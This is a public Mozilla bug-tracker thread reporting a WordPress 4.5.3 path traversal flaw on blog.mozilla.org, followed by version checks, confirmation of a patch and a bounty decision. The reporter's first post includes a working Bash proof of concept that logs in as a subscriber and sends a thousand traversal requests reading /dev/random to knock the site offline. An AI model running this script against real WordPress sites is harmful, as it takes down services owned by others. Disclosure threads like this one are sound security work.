Closed
Bug 1301309
Opened 9 years ago
Closed 9 years ago
Path Traversal Vulnerability in Mozilla WP-Engine Wordpress 4.5.3
Categories
(Websites Graveyard :: blog.mozilla.org, defect)
Websites Graveyard
blog.mozilla.org
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: minhalmehdi2000, Unassigned)
References
()
Details
(Keywords: reporter-external, sec-low, wsec-traversal, Whiteboard: [kanban:https://webops.kanbanize.com/ctrl_board/2/3398] [reporter-external] [web-bounty-form] [verif?])
Attachments
(3 files)
Path Traversal Vulnerability in Mozilla blog
affected URL : https://blog.mozilla.org
CMS : wordpress
Version 4.5.3
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress 4.5.3 Admin API. and https://blog.mozilla.org is using the same version so its affected with the vulnerability, This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected website.
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin()
As can be seen in the attached screenshot, the function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.
Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a website. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case.
------------------------------------------------------------------------
Proof of concept
The following Bash script can be used to trigger the denial of service condition.
#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
# login
curl --cookie-jar "$cookiejar" \
--data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
"$target/wp-login.php" \
>/dev/null 2>&1
# exhaust apache
for i in `seq 1 1000`
do
curl --cookie "$cookiejar" \
--data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
"$target/wp-admin/admin-ajax.php" \
>/dev/null 2>&1 &
done
rm "$cookiejar"
------------------------------------------------------------------------
Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF
Flags: sec-bounty?
| Reporter | ||
Comment 1•9 years ago
|
||
| Reporter | ||
Comment 2•9 years ago
|
||
Comment 3•9 years ago
|
||
minhal - This site is hosted via WPEngine and I do see references to 4.5.3, but it's a little surprising because I believe they upgrade these on a regular interval.
fox2mike - Can you please poke WpEngine to verify the version on this site? It seems like it might not be getting upgrades or it's got some older version reference on the site.
Flags: needinfo?(smani)
Updated•9 years ago
|
Keywords: sec-low,
wsec-traversal
| Reporter | ||
Comment 4•9 years ago
|
||
hello i checked for the version.
the blog is still running on wordpress 4.5.3 so the vulnerability exists in mozilla official blog,
to check the version there are several methods such as reading the readme.html (which is deleted on your blog)
another way is to check source code that may disclose the wordpress version if you don't hide it.
steps : open https://blog.mozilla.org/
press ctrl+ U (view source)
find wp-emoji-release.min.js?ver="
in the ver= there will be version of wordpress. you can check it on other blogs too.
so the script on mozilla blog is
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"https:\/\/blog.mozilla.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.3"}};
which is showing that your wordpress version is 4.5.3
so the vulnerability exists in the,
so i'm eligible for acknowldegement ?
i'm also attaching screenshot for clarification
| Reporter | ||
Comment 5•9 years ago
|
||
Comment 6•9 years ago
|
||
Minhal: I saw the same thing in the blog source, we're waiting for feedback from the service owner to contac the vendor.
Summary: Path Traversal Vulnerability in Mozilla → Path Traversal Vulnerability in Mozilla WP-Engine Wordpress 4.5.3
Whiteboard: [reporter-external] [web-bounty-form] [verif?] → [kanban:https://webops.kanbanize.com/ctrl_board/2/3398] [reporter-external] [web-bounty-form] [verif?]
Minhal, which WordPress security advisory are you referencing for this specific issue? Our Wordpress instance is not necessarily stock WordPress 4.5.3 and we need to know specifically which WP vuln announcement you're referencing so we can check our mitigations.
Flags: needinfo?(minhalmehdi2000)
| Reporter | ||
Comment 8•9 years ago
|
||
hello
its the security advisory reference
https://security-tracker.debian.org/tracker/CVE-2016-6896
Comment 9•9 years ago
|
||
Jonathan - We're on 4.6.1 now, can you confirm this is patched?
Thanks!
Flags: needinfo?(smani)
Comment 10•9 years ago
|
||
Confirmed!
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Comment 11•9 years ago
|
||
sec-bounty-'d (sec-low in a non-eligible site)
Also, lifted security flag, bug is public now.
Group: websites-security
Flags: sec-bounty? → sec-bounty-
| Reporter | ||
Comment 12•9 years ago
|
||
any acknowledgement for report ? when i reported the issue site was on 4.5.3, you guys recently updated it.
i also attached screenshot of version 4.5.3
Updated•9 years ago
|
Component: Other → blog.mozilla.org
Comment 13•9 years ago
|
||
We appreciate you reporting this to us. The Wordpress provider we use for this site was already in the process of updating Wordpress when we received your report and contacted them for a status update. Their update was performed without our direct involvement in an acceptably prompt fashion.
In general, please take care when filing newly-released software updates as security issues. If your report is derived entirely from comparing two version numbers and looking for security vulnerabilities fixed in the newer version, it is essential that it include a link to an offsite description of the issue(s) in question. Our response to you was delayed significantly due to the absence of the link you copied comment 0 from; for posterity, it appears to have been copied in part (without attribution) from:
https://sumofpwn.nl/advisory/2016/path_traversal_vulnerability_in_wordpress_core_ajax_handlers.html
Alternately, the inclusion of any publicly-assigned vulnerability tag (OVE-20160712-0036, Wordpress Trac #37490, CVE-2016-6896 or CVE-2016-6897) would have been immensely valuable. The OVE tag was present in the original source material for this report, and its removal hindered our work rather than helping it.
Clearing needinfo? as the requested information was not available upon request, and since we're already upgraded in production. Please do let us know if you find any WP instances running code older than 1-2 weeks, though - not all of our instances are managed by this provider, and if they are not updated to either 4.6.0 or 4.6.1 after a couple weeks from today, that *is* important to us and we would of course appreciate your bugs for those sites.
Flags: needinfo?(minhalmehdi2000)
Comment 14•9 years ago
|
||
(Some light investigation reveals that WordPress 4.6.0 contained an unannounced fix for the above-referenced CVEs, and that the referenced CVEs are still marked as 'reserved' by - presumably - Automattic themselves. I assume their ongoing embargo of the CVEs is why we were on 4.5.3 when the vulnerability and its exploit code were announced immediately prior to this bug being filed.)
Updated•7 years ago
|
Product: Websites → Websites Graveyard
Updated•7 years ago
|
Product: Websites Graveyard → Websites
Updated•7 years ago
|
Product: Websites → Websites Graveyard
Updated•2 years ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•